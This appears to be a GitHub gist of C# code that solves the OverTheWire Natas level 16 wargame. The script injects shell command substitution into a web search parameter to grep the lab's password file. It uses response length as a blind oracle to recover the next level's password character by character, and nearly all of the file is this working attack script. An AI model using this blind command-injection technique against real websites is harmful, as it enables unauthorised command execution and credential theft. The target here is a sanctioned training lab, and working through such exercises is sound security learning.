Created
March 3, 2018 01:52
-
-
Save HFahlstedt/213328098e76f5bcf33292f1b6408c16 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var alphaNumericChars = Enumerable.Range('0', '9' - '0' + 1).Union(Enumerable.Range('A', 'Z' - 'A' + 1)).Union(Enumerable.Range('a', 'z' - 'a' + 1)).Select(Convert.ToChar).ToList(); | |
var userPass = "natas16:<-- natas16 password -->"; | |
var token = Convert.ToBase64String(Encoding.UTF8.GetBytes(userPass)); | |
var positiveResponseLength = 1105; | |
var client = new HttpClient(); | |
client.DefaultRequestHeaders.Authorization = new System.Net.Http.Headers.AuthenticationHeaderValue("Basic", token); | |
client.BaseAddress = new Uri("http://natas16.natas.labs.overthewire.org"); | |
var passwordLength = 0; | |
var done = false; | |
var regex = "."; | |
while (!done) | |
{ | |
var response = await client.GetStringAsync($"/?needle=$(grep {regex} /etc/natas_webpass/natas17)&submit=Search"); | |
if (response.Length > positiveResponseLength) | |
{ | |
done = true; | |
} | |
else | |
{ | |
passwordLength++; | |
regex += "."; | |
} | |
} | |
Console.WriteLine($"Password is {passwordLength} characters"); | |
var usedChars = new List<char>(); | |
foreach (var c in alphaNumericChars) | |
{ | |
var response = await client.GetStringAsync($"/?needle=$(grep {c} /etc/natas_webpass/natas17)&submit=Search"); | |
if (response.Length == positiveResponseLength) | |
{ | |
usedChars.Add(c); | |
} | |
} | |
Console.WriteLine($"Password contains these characters: {String.Join("", usedChars)}"); | |
var password = new StringBuilder(); | |
for (int i = 0; i < passwordLength; i++) | |
{ | |
foreach (var c in usedChars) | |
{ | |
var response = await client.GetStringAsync($"/?needle=sonatas$(grep ^{password}{c} /etc/natas_webpass/natas17)&submit=Search"); | |
if (response.Length == positiveResponseLength) | |
{ | |
password.Append(c); | |
break; | |
} | |
} | |
} | |
Console.WriteLine($"Password is {password}"); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment